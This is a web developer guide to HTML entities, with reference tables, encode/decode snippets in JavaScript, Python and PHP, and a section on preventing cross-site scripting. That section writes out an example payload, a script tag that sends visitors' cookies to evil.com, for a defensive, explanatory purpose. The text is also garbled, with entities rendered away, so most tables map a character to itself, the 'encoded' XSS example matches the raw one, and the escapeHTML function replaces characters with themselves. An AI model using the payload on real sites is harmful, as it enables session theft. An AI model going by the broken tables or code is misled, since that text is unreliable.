HTML entities are the mechanism that makes the web work. Without them, you couldn't display a less-than sign in your text, render accented characters reliably, or safely embed user-generated content. Every time a browser encounters < and renders it as <, HTML entities are doing their job.
This guide covers the complete picture: how HTML entities work under the hood, the essential reference tables you'll use daily, encoding and decoding strategies, and the critical role entities play in preventing cross-site scripting (XSS) attacks.
An HTML entity is a sequence of characters that represents a single character that either can't be typed directly or has special meaning in HTML. They always start with an ampersand (&) and end with a semicolon (;).
When the browser parses HTML, it replaces each entity with its corresponding character before rendering. This means & in your source code becomes & on screen, and © becomes ©.
The HTML specification defines over 2,000 named entities (expanded significantly in HTML5), plus support for any Unicode character via numeric references.
There are three ways to write an HTML entity:
Human-readable names defined by the HTML specification:
& → & (ampersand)
< → < (less-than)
> → > (greater-than)
© → © (copyright)
€ → € (euro sign)
→ (non-breaking space)
Named entities are preferred for readability and maintainability — any developer can understand © at a glance.
Unicode code point in decimal, prefixed with &#:
& → & (ampersand)
< → < (less-than)
© → © (copyright)
€→ € (euro sign)
Unicode code point in hexadecimal, prefixed with &#x:
& → & (ampersand)
< → < (less-than)
© → © (copyright)
€→ € (euro sign)
&#x.
HTML uses <, >, &, ", and ' as syntax delimiters. If you need to display these characters as content (not markup), you must encode them:
<!-- Without entities, the browser thinks this is a tag -->
<p>Use 5 > 3 to compare numbers</p>
<!-- Correct: entities preserve the intended content -->
<p>Use 5 > 3 to compare numbers</p>
While UTF-8 encoding handles most characters natively, entities provide a reliable fallback for characters that might be corrupted by encoding mismatches, email clients, or legacy systems:
é → é (e with acute)
ñ → ñ (n with tilde)
ü → ü (u with umlaut)
HTML collapses multiple spaces into one. Entities let you insert precise whitespace and invisible characters:
→ Non-breaking space (doesn't collapse)
  → En space (half em)
  → Em space (full em)
 → Thin space
‍ → Zero-width joiner (for emoji sequences)
These five entities are mandatory knowledge for every web developer:
| Character | Named | Decimal | Hex | Purpose |
|---|---|---|---|---|
| & | & | & | & | Ampersand |
| < | < | < | < | Less than |
| > | > | > | > | Greater than |
| " | " | " | " | Double quote |
| ' | ' | ' | ' | Single quote (apostrophe) |
| Symbol | Named | Description |
|---|---|---|
| © | © | Copyright |
| ® | ® | Registered trademark |
| ™ | ™ | Trademark |
| € | € | Euro |
| £ | £ | Pound sterling |
| ¥ | ¥ | Yen/Yuan |
| ¢ | ¢ | Cent |
| § | § | Section sign |
| ± | ± | Plus-minus |
| × | × | Multiplication |
| ÷ | ÷ | Division |
| ° | ° | Degree |
| µ | µ | Micro sign |
| ¶ | ¶ | Pilcrow/paragraph |
| … | … | Horizontal ellipsis |
| – | – | En dash |
| — | — | Em dash |
| ← | ← | Left arrow |
| → | → | Right arrow |
| ♥ | ♥ | Heart |
| ✓ | ✓ | Check mark |
| Symbol | Named | Description |
|---|---|---|
| ≤ | ≤ | Less than or equal |
| ≥ | ≥ | Greater than or equal |
| ≈ | ≈ | Approximately equal |
| ≠ | ≠ | Not equal |
| ∞ | ∞ | Infinity |
| √ | √ | Square root |
| ∑ | ∑ | Summation |
| π | π | Pi |
HTML encoding converts special characters into their entity equivalents. Decoding reverses the process. This is a fundamental operation in web development, especially when handling user input.
// Encode HTML entities
function escapeHTML(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
// Decode HTML entities
function unescapeHTML(str) {
const el = document.createElement('textarea');
el.innerHTML = str;
return el.value;
}
// Modern approach: the TextEncoder API handles raw encoding,
// but for HTML entities specifically, use a sanitizer library
// like DOMPurify for comprehensive protection.
import html
# Encode
encoded = html.escape(user_input) # converts < to <, & to &
# Decode
decoded = html.unescape(encoded) # converts < back to <
// Encode
$encoded = htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
// Decode
$decoded = htmlspecialchars_decode($encoded);
Cross-site scripting (XSS) is one of the most common web vulnerabilities. It occurs when an attacker injects malicious JavaScript into a web page by embedding it in user content that the page renders without sanitization.
Imagine a comment section where users can post messages. An attacker submits:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
If the server renders this directly into the page, the script executes in every visitor's browser, stealing their session cookies.
When you HTML-encode the attacker's input, the browser treats it as text, not markup:
<script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script>
The browser displays this as literal text: <script>fetch('https://evil.com/steal?cookie=' + document.cookie)</script> — no code execution.
Content-Security-Policy headers, input validation, and context-aware encoding (different escaping for JavaScript strings, URLs, and CSS).
The correct encoding depends on where user data appears in the document:
<, >, &, ")\x3c, \x3e, \")%3C, %3E)\3c, \3e)Use established libraries like DOMPurify (JavaScript), bleach (Python), or your framework's built-in escaping (React's JSX, Django's {{ var|escape }}, Laravel's Blade {{ }}) rather than rolling your own.
&, <, >, ", and ' should be second nature.& twice produces &amp;, which displays as & instead of &.Convert special characters to HTML entities and back. Supports batch conversion, Unicode lookup, and full character reference — free and instant.
Open HTML Entities Encoder →HTML entities are a small but critical part of web development. They solve three fundamental problems: displaying reserved characters, representing Unicode characters reliably, and preventing XSS attacks. The five essential entities (&, <, >, ", ') should be automatic in every developer's muscle memory. For everything else, keep a reference handy and let your framework's auto-escaping handle the heavy lifting. Understanding entities isn't just about knowing the syntax — it's about building secure, reliable web applications.